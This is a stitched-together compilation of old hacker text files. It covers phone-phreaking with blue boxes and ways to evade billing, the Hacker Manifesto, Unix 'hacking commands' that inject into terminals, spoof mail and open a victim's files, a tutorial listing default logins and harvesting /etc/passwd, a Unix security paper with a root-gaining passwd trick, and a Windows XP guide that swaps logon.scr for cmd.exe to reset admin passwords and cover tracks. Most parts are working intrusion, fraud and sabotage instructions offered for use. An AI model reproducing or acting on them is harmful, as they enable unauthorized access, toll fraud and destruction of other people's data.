frequencies are public knowledgenow, one blind phone phreak has even had them recorded in one of thosetalking books for the blind, they just have to find the musical notes on theorgan which correspond to the phone tones. Then they tape them. Forinstance, to get Ma Bell’s tone for the number, you press down organ keys F3and A3 (900 and 700 cycles per second) at the same time. To produce the tonefor 2 it’s F3 and C6 (1100 and 700 c.p.s). The phone phreaks circulate thewhole list of notes so there’s no trial and error anymore.”He shows me a list of the rest of the phone numbers and the two electricorgan keys that produce them.”Actually, you have to record these notes at 3 3/4 inches per second tapespeed and double it to 7 1/2 inches per second when you play them back, toget the proper tones,” he adds.”So once you have all the tones recorded, how do you plug them into thephone system?””Well, they take their organ and their cassette recorder, and start bangingout entire phone numbers in tones on the organ, including country codes,routing instructions, ‘KP’ and ‘Start’ tones. Or, if they don’t have anorgan, someone in the phone-phreak network sends them a cassette with allthe tones recorded with a voice saying ‘Number one,’ then you have the tone,’Number two,’ then the tone and so on. So with two cassette recorders theycan put together a series of phone numbers by switching back and forth fromnumber to number. Any idiot in the country with a cheap cassette recordercan make all the free calls he wants.””You mean you just hold the cassette recorder up to the mouthpiece andswitch in a series of beeps you’ve recorded? The phone thinks that anythingthat makes these tones must be its own equipment?””Right. As long as you get the frequency within thirty cycles per second ofthe phone company’s tones, the phone equipment thinks it hears its own voicetalking to it. The original grandaddy phone phreak was this blind kid withperfect pitch, Joe Engressia, who used to whistle into the phone. Anoperator could tell the difference between his whistle and the phonecompany’s electronic tone generator, but the phone company’s switchingcircuit can’t tell them apart.The bigger the phone company gets and the further away from human operatorsit gets, the more vulnerable it becomes to all sorts of phone Phreaking.”A GUIDE FOR THE PERPLEXED”But wait a minute,” I stop Gilbertson. “If everything you do sounds likephone-company equipment, why doesn’t the phone company charge you for thecall the way it charges its own equipment?””Okay. That’s where the 2600-cycle tone comes in. I better start from thebeginning.”The beginning he describes for me is a vision of the phone system of thecontinent as thousands of webs, of long-line trunks radiating from each ofthe hundreds of toll switching offices to the other toll switching offices.Each toll switching office is a hive compacted of thousands of long-distancetandems constantly whistling and beeping to tandems in far-off tollswitching offices.The tandem is the key to the whole system. Each tandem is a line with somerelays with the capability of signaling any other tandem in any other tollswitching office on the continent, either directly one-to-one or byprogramming a roundabout route several other tandems if all the directroutes are busy. For instance, if you want to call from New York to LosAngeles and traffic is heavy on all direct trunks between the two cities,your tandem in New York is programmed to try the next best route, which maysend you down to a tandem in New Orleans, then up to San Francisco, or downto a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerquetandem and finally up to Los Angeles.When a tandem is not being used, when it’s sitting there waiting for someoneto make a long-distance call, it whistles. One side of the tandem, the side”facing” our home phone, whistles at 2600 cycles per second toward all thehome phones serviced by the exchange, telling them it is at their service,should they be interested in making a long-distance call. The other side ofthe tandem is whistling 2600 c.p.s. into one or more long distance trunklines, telling the rest of the phone system that it is neither sending norreceiving a call through the trunk at the moment, that it has no use forthat trunk at the moment.When you dial a long-distance number the first thing that happens is thatyou are hooked into a tandem. A register comes up to the side of the tandemfacing away from you and presents that side with the number you dialed. Thissending side of the tandem stops whistling 2600 into its trunk line. When atandem stops the 2600 tone it has been sending through a trunk, the trunk issaid to be “seized,” and is now ready to carry the number you have dialed,converted into multi-frequency beep tones, to a tandem in the area code andcentral office you want.Now when a blue-box operator wants to make a call from New Orleans to NewYork he starts by dialing the 800 number of a company which might happen tohave its headquarters in Los Angeles. The sending side of this New Orleanstandem stops sending 2600 out over the trunk to the central office in LosAngeles, thereby seizing the trunk. Your New Orleans tandem begins sendingbeep tones to a tandem it has discovered idly whistling 2600 cycles in LosAngeles. The receiving end of that L.A. tandem is seized, stops whistling2600, listens to the beep tones which tell it which L.A. phone to ring, andstarts ringing the 800 number. Meanwhile, a mark made in the New Orleansoffice accounting tape indicates that a call from your New Orleans phone tothe 800 number in L.A. has been initiated and gives the call a code number.Everything is routine so far.But then the phone phreak presses his blue box to the mouthpiece and pushesthe 2600-cycle button, sending 2600 out from the New Orleans tandem noticesthe 2600 cycles are coming over the line again and assumes that New Orleanshas hung up because the trunk is whistling as if idle. But,Thus the blue-box operator in New Orleans now is in touch with a tandem inL.A. which is waiting like and obedient genie to be told what to do next.The blue-box owner then beeps out the ten digits of the New York numberwhich tells the L.A. tandem to relay a call to New York City. Which itpromptly does. As soon as your party picks up the phone in New York, theside of the New Orleans tandem facing you stops sending 2600 to you andstarts carrying his voice to you by way of the L.A. tandem. A notation ismade on the accounting tape that the connection has been made on the 800call which had been initiated and noted earlier. When you stop talking toNew York a notation is made that the 800 call has ended.At three the next morning, when phone company’s accounting computer startsreading back over the master accounting tape for the past day, it recordsthat a call of a certain length of time was made from your New Orleans hometo an L.A. 800 number and, of course the accounting computer has beentrained to ignore these toll free 800 calls when compiling your monthlybill.”All they can prove is that you made an 800 call,” Gilbertson the inventorconcludes. “Of course, if you’re foolish enough to talk for two hours on an800 call, and they’ve installed one of their special anti-fraud computerprograms to watch out for such things, they may spot you and ask you why youtook two hours talking to Army Recruiting’s 800 number when you’re 4-F. Butif you do it from a pay phone, they may discover something peculiar the nextday, if they’ve got a blue-box hunting program in their computer, but you’llbe a long time gone from the pay phone by then. Using a pay phone is almostguaranteed safe.””What about the recent series of blue-box arrests all across the country,New York, Cleveland, and so on?” I asked. “How were they caught so easily?””From what I can tell, they made one big mistake. They were seizing trunksusing an area code plus 555-1212 instead of an 800 number. When you sendmulti-frequency beep tones off 555 you get a charge for it on your tape andthe accounting computer knows there’s something wrong when it tries to billyou for a two-hour call to Akron, Ohio, information, and it drops a troublecard which goes right into the hands of the security agent if they’relooking for blue-box users.”Whoever sold those guys their blue boxes didn’t tell them how to use themproperly, which is fairly irresponsible. And they were fairly stupid to usethem at home all the time. But what those arrests really mean is that anawful lot of blue boxes are flooding into the country and that people arefinding them so easy to make that they know how to make them before theyknow how to use them. Ma Bell is in trouble.””And if a blue-box operator or a cassette-recorder phone phreak sticks topay phones and 800 numbers, the phone company can’t stop them?””Not unless they change their entire nationwide long-lines technology, whichwill take them a few billion dollars and twenty years. Right now they can’tdo a thing. They’re screwed.”CAPTAIN CRUNCH DEMONSTRATES HIS FAMOUS UNITThere is an underground telephone network in this country. Gilbertsondiscovered it the very day news of his activities hit the papers. Thatevening his phone began ringing. Phone phreaks from Seattle, from Florida,from New York, from San Jose, and from Los Angeles began calling him andtelling him about the phone-phreak network. He’d get a call from a phonephreak who’d say nothing but, “Hang up and call this number.”When he dialed the number he’d find himself tied into a conference of adozen phone phreaks arranged through a quirky switching station in BritishColumbia. They identified themselves as phone phreaks, they demonstratedtheir homemade blue boxes which they called “MFers”(for multi-frequency,among other things) for him, they talked shop about phone phreak devices.They let him in on their secrets on the theory that if the phone company wasafter him he must be trustworthy. And, Gilbertson recalls, they stunned himwith their technical sophistication.I ask him how to get in touch with the phone-phreak network. He digs aroundthrough a file of old schematics and comes up with about a dozen numbers inthree widely separated area codes.”Those are the centers,” he tells me. Alongside some of the numbers hewrites in first names or nicknames: names like Captain Crunch, Dr. No, FrankCarlson, (also a code word for free call), Marty Freeman (code word for MF
device), Peter the Perpendicular Pimple, Alefnull, and The Cheshire Cat. Hemakes checks alongside the names of those among these top twelve who areblind. There are five checks.I ask him who this Captain Crunch person is.”Oh, The Captain. He’s probably the most legendary phone phreak. He callshimself Captain Crunch after the notorious Cap’n Crunch 2600 whistle.Several years ago the makers of Cap’n Crunch breakfast cereal offered a toywhistle prize in every box as a treat for the Cap’n Crunch set. Somehow aphone phreak discovered that the toy whistle just happened to produce aperfect 2600-cycle tone. When the man who calls himself Captain Crunch wastransferred overseas to England with his Air Force unit, he would receivescores of calls from his friends and “mute” them, that is, make them free ofcharge to them, by blowing his Cap’n Crunch whistle into his end.””Captain Crunch is one of the older phone phreaks,” Gilbertson tells me.”He’s an engineer who once got in a little trouble for fooling around withthe phone, but he can’t stop. Well, this guy drives across country in aVolkswagen van with an entire switchboard and a computerizedsuper-sophisticated MFer in the back. He’ll pull up to a phone booth on alonely highway somewhere, snake a cable out of his bus, hook it onto thephone and sit for hours, days sometimes, sending calls zipping back andforth across the country, all over the world.”Back at my house, I dialed the number he gave me for “Captain Crunch” andasked for Gary Thomas, his real name, or at least the name he uses when he’snot dashing into a phone booth beeping out MF tones faster than a speedingbullet, and zipping phantomlike through the phone company’s long-distancelines.When Gary answered the phone and I told him I was preparing a text fileabout phone phreaks, he became very indignant.”I don’t do that. I don’t do that anymore at all. And if I do it, I do itfor one reason and one reason only. I’m learning about a system. The phonecompany is a system. A computer is a system. Do you understand? If I do whatI do, it is only to explore a System. Computers. Systems. That’s my bag. Thephone company is nothing but a computer.”A tone of tightly restrained excitement enters the Captain’s voice when hestarts talking about Systems. He begins to pronounce each syllable with thehushed deliberation of an obscene caller.”Ma Bell is a system I want to explore. It’s a beautiful system, you know,but Ma Bell screwed up. It’s terrible because Ma Bell is such a beautifulsystem but she screwed up. I learned how she screwed up from a couple ofblind kids who wanted me to build a device. A certain device. They said itcould make free calls. But when these blind kids told me I could make callsinto a computer, my eyes lit up. I wanted to learn about computers. I wantedto learn about Ma Bell’s computers. So I built the little device. Only Ibuilt it wrong and Ma Bell found out. Ma Bell can detect things like that.Ma Bell knows. So I’m strictly out of it now. I don’t do it. Except forlearning purposes.” He pauses. “So you want to write a text file. Are youpaying for this call? Hang up and call this number.”He gives me a number in an area code a thousand miles north of his own. Idial the number.”Hello again. This is Captain Crunch. You are speaking to me on a toll-freeloop in Portland Oregon. Do you know what a toll-free loop is? I’ll tellyou.”He explains to me that almost every exchange in the country has open testnumbers which allow other exchanges to test their connections with it. Mostof thest numbers occur in consecutive pairs, such as 302 956-0041 and956-0042. Well certain phone phreaks discovered that if two people fromanywhere in the country dial those two consecutive numbers they can talktogether just as if one had called the other’s number, with no charge toeither of them, of course.”Your voice is looping around in a 4A switching machine up there in Canada,zipping back down to me,” the Captain tells me. “My voice is looping aroundup there and back down to you. And it can’t ever cost anyone money. Thephone phreaks and I have compiled a list of many many of these numbers. Youwould be surprised if you saw the list. I could show it to you. But I won’t.I’m out of that now. I’m not out to screw Ma Bell. I know better. If I doanything it’s for the pure knowledge of the System. You can learn to dofantastic things. Have you ever heard eight tandems stacked up? Do you knowthe sound of tandems stacking and unstacking? Give me your phone number.Hang up now and wait a minute.Slightly less than a minute later the phone rang and the Captain was on theline, his voice sounding far more excited, almost aroused.”I wanted to show you what it’s like to stack up tandems (Whenever theCaptain says “stack up” he sounds like he is smacking his lips).””How do you like the connection you’re on now?” the Captain asks me. “It’s araw tandem. A raw tandem. I’m going to show you what it’s like to stack up.Blow off. Land in a faraway place. To stack that tandem up, whip back andforth across the country a few times, then shoot on up to Moscow.””Listen,” Captain Crunch continues. “Listen. I’ve got a line tie on myswitchboard here, and I’m gonna let you hear me stack and unstack tandems.Listen to this. I’m gonna blow your mind.”First I hear a super rapid-fire pulsing of flutelike phone tones, then apause, then another popping burst of tones, then another, then another. Eachburst is followed by a beep-kachink sound.”We have now stacked up four tandems,” said Captain Crunch, soundingsomewhat remote. “That’s four tandems stacked up. Do you know what thatmeans? That means I’m whipping back and forth, back and forth twice, acrossthe country, before coming to you. I’ve been known to stack up twentytandems at a time. Now, just like I said, I’m going to shoot up to Moscow.”There is a new longer series of beeper pulses over the line, a briefsilence, then a ring.”Hello,” answers a far-off voice.”Hello, Is this the American Embassy Moscow?””Yes, sir, who is calling?” says the voice.”Yes, This is test board here in New York. We’re calling to check out thecircuits, see what kind of lines you’ve got. Everything okay there inMoscow?””Okay?””Well, yes, how are things there?””Oh. Well everything’s okay, I guess.””Okay. Thank you.” They hang up, leaving a confused series of beep-kachinksounds hanging in mid-ether in the wake of the call before disolving away.
Hackers Manifesto -Another one got caught today, it’s all over the papers. “Teenager Arrestedin Computer Crime Scandal”, “Hacker Arrested after Bank Tampering”…Damn kids. They’re all alike.But did you, in your three-piece psychology and 1950’s technobrain, evertake a look behind the eyes of the hacker? Did you ever wonder what madehim tick, what forces shaped him, what may have molded him?I am a hacker, enter my world…Mine is a world that begins with school… I’m smarter than most of theother kids, this crap they teach us bores me…Damn underachiever. They’re all alike.I’m in junior high or high school. I’ve listened to teachers explain for thefifteenth time how to reduce a fraction. I understand it. “No, Ms. Smith, Ididn’t show my work. I did it in my head…”Damn kid. Probably copied it. They’re all alike.I made a discovery today. I found a computer. Wait a second, this is cool. Itdoes what I want it to. If it makes a mistake, it’s because I screwed it up.Not because it doesn’t like me…Or feels threatened by me…Or thinks I’m a smart ass…Or doesn’t like teaching and shouldn’t be here…Damn kid. All he does is play games. They’re all alike.And then it happened… a door opened to a world… rushing through thephone line like heroin through an addict’s veins, an electronic pulse is sentout, a refuge from the day-to-day incompetencies is sought… a board isfound.”This is it… this is where I belong…”I know everyone here… even if I’ve never met them, never talked to them,may never hear from them again… I know you all…Damn kid. Tying up the phone line again. They’re all alike…You bet your ass we’re all alike… we’ve been spoon-fed baby food at schoolwhen we hungered for steak… the bits of meat that you did let slip throughwere pre-chewed and tasteless. We’ve been dominated by sadists, or ignoredby the apathetic. The few that had something to teach found us willingpupils, but those few are like drops of water in the desert.This is our world now… the world of the electron and the switch, the beautyof the baud. We make use of a service already existing without paying forwhat could be dirt-cheap if it wasn’t run by profiteering gluttons, and youcall us criminals. We explore… and you call us criminals. We seek afterknowledge… and you call us criminals. We exist without skin color, withoutnationality, without religious bias… and you call us criminals. You buildatomic bombs, you wage wars, you murder, cheat, and lie to us and try tomake us believe it’s for our own good, yet we’re the criminals.Yes, I am a criminal. My crime is that of curiosity. My crime is that ofjudging people by what they say and think, not what they look like. Mycrime is that of outsmarting you, something that you will never forgive mefor.I am a hacker, and this is my manifesto. You may stop this individual, butyou can’t stop us all… after all, we’re all alike.

A List Of Some OF The Most Useful UNIX : Hacking Commands, and Some Hints On Their Usage


It is fun and often usefull to create a file that is owned
by someone else.  On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done.  The chown command
will change any of your files to make someone else the owner.
Format is as follows:

chown ownername filelist

Where ownername is the new owner, and filelist is the list of
files to change.  You must own the file which your are goin to
change, unless you are a superuser….then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file.  If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first!  Once the
file is owned by someone else, you cant change nything about it!

—————————————————————

Sometimes just seeing who is on the system is a challenge in
itself.  The best way is to write your own version of who in C,
but if you can’t do that then this may be of some help to you:

who   followed by on or more of the following flags:

-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a – means u cannot)
-u Give a complete listing of those logged on.

**who -HTu is about the best choice for the average user**

##by the way, the list of users logged on is kept in the file
/etc/utmp.  If you want to write your own personalised version of
who in C, you now know where to look!###

—————————————————————

When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it.  These files can be found in the /dev
directory.  You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size.  They are called
character specific files, and are really the link between the
system and the terminals.  Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
“mesg n” command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.

Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by ‘cating’ a string to a users screen.  You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!).  Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by “exit”
followed by a carriage return, followed by the transmit screen
code.  Using ths technique you can wipe peoples directories or
anything.  My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).

—————————————————————

If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:

chmod 777 $HOME
chmod 777 $MAIL

Then clear the screen so they dont see what you just typed.

Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!

—————————————————————

Another way to send fake mail to people is to use the mail
server.  This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average  user!

type telnet

the following prompt will appear:

telnet>

now type :

open localhost 25

some crap will come up about the mail server..now type:

mail from: xxxxxx     Put any name you want.

some more bullshit will come up. Now type:

rcpt to: xxxxxx  Put the name of the person to receive mail here.

now type:

data

now you can type the letter…end it with a “.”
type quit to exit once you are done.

————————————————————-

Heres one for any experimenters out there…
It is possible to create files which simply cannot be deleted
from the standard shell.  To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell.  Try things like Ctrl-h (this is the
code for the delete key).  Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back…..this is one of my
favourites..gets em every time!

The following script file is an example which will create a
file with the name Ctrl-h.  You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type “man vi” and print the
help file…it even contains stuff that I find useful now and
then.*****

type the following in vi…

echo” > ‘a^h’

***NOTE…to get the ^h (this really means ctrl-h) from vi type:

Ctrl v
Ctrl h

The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it.  It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.

*> Title:   Tutorial on hacking through a UNIX system

**

In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.

Brief history:  Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously.  Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier.  After about 2 years of developmental research, they produced
an operating system they called “Unix”.
Sixties to Current:  During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient.  One of the systems they
put on the Unix system was called “Elmos”. Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.

Note: Cosmos is accessed through the Elmos system.

Current:  Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful).  Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT’s.  Their result they called
Xenix (pronounced zee-nicks).  Both Unix and Xenix can be easily installed
on IBM PC’s and offer the same function (just 2 different vendors).

Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.

How to tell if/if not you are on a Unix system:  Unix systems are quite
common systems across the country. Their security appears as such:

Login;     (or login;)
password:

When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson).  Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password
assigned by the sysop or chosen by the user.

Common default logins
————————–
login;       Password:
root         root,system,etc..
sys          sys,system
daemon       daemon
uucp         uucp
tty          tty
test         test
unix         unix
bin          bin
adm          adm
who          who
learn        learn
uuhost       uuhost
nuucp        nuucp

If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a “super-user” account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:

$
%
#

But can be just about anything the sysop or user wants it to be.

Things to do when you are in: Some of the commands that you may want to
try follow below:

who is on  (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a      (list all files in current   directory.)
du -a      (checks amount of memory  your files use;disk usage)
cd\name    (name is the name of the sub-directory you choose)
cd\        (brings your home directory  to current use)
cat name   (name is a filename either  a program or documentation  your username has written)
Most Unix programs are written  in the C language or Pascal
since Unix is a programmers’  environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts.
This can be done by doing the following command:

cat /etc/passwd

If you are successful you will see a list of all accounts on the system.  It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal

The “root” line tells the following info :
login name=root
hvnsdcf   = encrypted password
0         = user group number
0         = user number
root dir  = name of user
/         = root directory

In the Joe login, the last part “/bin/joe ” tells us which directory
is his home directory (joe) is. In the “hal” example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.

Conclusion:  I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.

On the Security of UNIX

=-=-=-=-=-=-=-=-=-=-=-=

Recently there has been much interest in the security aspects of operating

systems and software.At issue is the ability to prevent undesired disclosure of

information, destruction of information,and harm to the functioning of the

system.This paper discusses the degree of security which can be provided under

the system and offers a number of hints on how to improve security.The first

fact to face is that UNIX was not developed with security,in any realistic

sense,in mind;this fact alone guarantees a vast number of holes.(Actually the

same statement can be made with respect to most systems.)

The area of security in which is theoretically weakest is in protecting against

crashing or at least crippling the operation of the system.The problem here is

not mainly in uncritical acceptance of bad parameters to system calls (there

may be bugs in this area, but none are known)but rather in lack of checks for

excessive consumption of resources.

Most notably, there is no limit on the amount of disk storage used, either in

total space allocated or in the number of files or directories.Here is a

particularly ghastly shell sequence guaranteed to stop the system:

while : ; do

mkdir x

cd x

done

Either a panic will occur because all the i-nodes on the device are used up,

or all the disk blocks will be consumed, thus preventing anyone from writing

files on the device.In this version of the system,users are prevented from

creating more than a set number of processes simultaneously,so unless users

are in collusion it is unlikely that any one can stop the system altogether.

However, creation of 20 or so CPU or disk-bound jobs leaves few resources

available for others.Also, if many large jobs are run simultaneously,swap space

may run out, causing a panic.  It should be evident that excessive consumption

of diskspace, files, swap space and processes can easily occur accidentally in

malfunctioning programs as well as at command level.In fact UNIX is essentially

defenseless against this kind of abuse,nor is there any easy fix.The best that

can be said is that it is generally fairly easy to detect what has happened

when disaster strikes ,to identify the user responsible, and take appropriate

action.In practice,we have found that difficulties in this area are rather

rare,but we have not been faced with malicious users,and enjoy a fairly

generous supply of resources which have served to cushion us against accidental

overconsumption.

The picture is considerably brighter in the area of protection of information

from unauthorized perusal and destruction.Here the degree of security seems

(almost) adequate theoretically, and the problems lie more in the necessity for

care in the actual use of the system.Each UNIX file has associated with it

eleven bits of protection information together with a user identification

number and a user-group identification number (UID and GID).

Nine of the protection bits are used to specify independently permission to

read, to write, and to execute the file to the user himself, to members of the

user’s group, and to all other users.Each process generated by or for a user

has associated with it an effective UID and a real UID, and an effective and

real GID.When an attempt is made to access the file for reading, writing, or

executing UID for the process is changed to the UID associated with the file;

the change persists until the process terminates or until the UID changed again

by another execution of a set-UID file.Similarly the effective group ID of a

process is changed to the GID associated with a file when that file is executed

and has the set-GID bit set.The real UID and GID of a process do not change

when any file is executed,but only as the result of a privileged system

call.The basic notion of the set-UID and set-GID bits is that one may write a

program which is executableby others and which maintains files accessible to

others only by that program.

The classical example is the game-playing program which maintains records of

the scores of its players.The program itself has to read and write the score

file,but no one but the game’s sponsor can be allowed unrestricted access to

the file lest they manipulate the game to their own advantage.

The solution is to turn on the set-UID bit of the game program.  When, and only

when,it is invoked by players of the game,it may update the score file but

ordinary programs executed by others cannot access the score.  There are a

number of special cases involved in determining access permissions.  Since

executing a directory as a program is a meaningless operation,the

execute-permission bit, for directories, is taken instead to mean permission to

search the directory for a given file during the scanning of a path name; thus

if a directory has execute permission but no read permission for a given user,

he may access files with known names in the directory,but may not read (list)

the entire contents of the directory.

Write permission on a directory is interpreted to mean that the user may create

and delete files in that directory;it is impossible for any user to write

directly into any directory..Another, and from the point of view of security,

much more serious special case is that there is a “super user” who is able to

read any file and write any non-directory.The super-user is also able to change

the protection mode and the owner UID and GID of any file and to invoke

privileged system calls.It must be recognized that the mere notion of a

super-user is a theoretical, and usually practical, blemish on any protection

scheme.

The first necessity for a secure system is of course arranging that all files

and directories have the proper protection modes.Traditionally, UNIX software

has been exceedingly permissive in this regard;essentially all commands create

files readable and writable by everyone.In the current version,this policy may

be easily adjusted to suit the needs ofthe installation or the individual user.

Associated with each process and its descendants is a mask, which is in effect

anded with the mode of every file and directory created by that process.  In

this way, users can arrange that, by default,all their files are no more

accessible than they wish.The standard mask, set by login,allows all permiss-

ions to the user himself and to his group,but disallows writing by others.

To maintain both data privacy and data integrity,it is necessary, and largely

sufficient,to make one’s files inaccessible to others.  The lack of sufficiency

could follow from the existence of set-UID programs created by the user and the

possibility of total breach of system security in one of the ways discussed

below(or one of the ways not discussed below).

For greater protection,an encryption scheme is available.Since the editor is

able to create encrypted documents, and the crypt command can be used to pipe

such documents into the other text-processing programs,the length of time

during which clear text versions need be available is strictly limited.The

encryption scheme used is not one of the strongest known, but it is judged

adequate, in the sense that cryptanalysisis likely to require considerably more

effort than more direct methods of reading the encrypted files.For example, a

user who stores data that he regards as truly secret should be aware that he is

implicitly trusting the system administrator not to install a version of the

crypt command that stores every typed password in a file.  Needless to say, the

system administrators must be at least as careful as their most demanding user

to place the correct protection mode on the files under their control.

In particular,it is necessary that special files be protected from writing, and

probably reading, by ordinary users when they store sensitive files belonging

to otherusers.It is easy to write programs that examine and change files by

accessing the device on which the files live.

On the issue of password security,UNIX is probably better than most systems.

Passwords are stored in an encrypted form which, in the absence of serious

attention from specialists in the field,appears reasonably secure, provided its

limitations are understood.In the current version, it is based on a slightl y

defective version of the Federal DES;it is purposely defective so that

easily-available hardware is useless for attempts at exhaustive

key-search.Since both the encryption algorithm and the encrypted passwords are

available,exhaustive enumeration of potential passwords is still feasible up to

a point.We have observed that users choose passwords that are easy to

guess:they are short, or from a limited alphabet, or in a dictionary.

Passwords should be at least six characters long and randomly chosen from an

alphabet which includes digits and special characters.

Of course there also exist feasible non-cryptanalytic ways of finding out

passwords.For example:    write a program which types out “login:”on the

typewriter and copies whatever is typed to a file of your own.    Then invoke the

command and go away until the victim arrives..The set-UID (set-GID)notion must

be used carefully if any security is to be maintained.    The first thing to keep

in mind is that a writable set-UID file can have another program copied onto

it.

For example, if the super-user command is writable,anyone can copy the shell

onto it and get a password-free version of Shell Unix.A more subtle problem can

come from set-UID programs which are not sufficiently careful of what is fed

into them.To take an obsolete example,the previous version of the mail command

was set-UID and owned by the super-user.This version sent mail to the r

ecipient’s own directory.The notion was that one should be able to send mail to

anyone even if they want to protecttheir directories from writing.  The trouble

was that mailwas rather dumb:anyone could mail someone else’s priva te file to

himself.Much more seriousis the following scenario:  make a file with a line

like one in the password filewhich allows one to log in as the super-user.Then

make a link named “.mail” to the password file in some writable directory on

the same device as the password file (say /tmp).  Finally mail the bogus login

line to /tmp/.mail;You can then login as the superuser,clean up the

incriminating evidence,and have your will.

The fact that users can mount their own disks and tapes as file systems can be

another way of gaining super-user status.Once a disk pack is mounted, the

system believes what is on it.Thus one can take a blank disk pack,put on it

anything desired,and mount it.There are obvious and unfortunate consequences.

For example:a mounted disk with garbage on it will crash the system;one of the

files on the mounted disk can easily be a password-free version of Shell Unix;

other files can be unprotected entries for special files.  The only easy fix

for this problem is to forbid the use of mount to unpriv- ileged users.A

partial solution, not so restrictive,would be to have the mount command examine

the special file for bad data,set-UID programs owned by others ,and accessible

special files,and balk at unprivileged invokers.

How to hack Windows XP Admin Passwords (the easy way)


This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Windows XP Home and Pro.
—————————————————————————–
Now this one seems to be machine dependant, it works randomly(don’t know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on http://www.astalavista.com a few days ago but i found that it wouldn’t work
on the welcome screen of a normal booted machine)
—————————————————————————–
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
—————————————————————————–
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
“net user <admin account name here> password”
If the Administrator Account is called SAMAD and you want the password blah enter this
“net user SAMAD blah”
and this changes the password on SAMADs machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either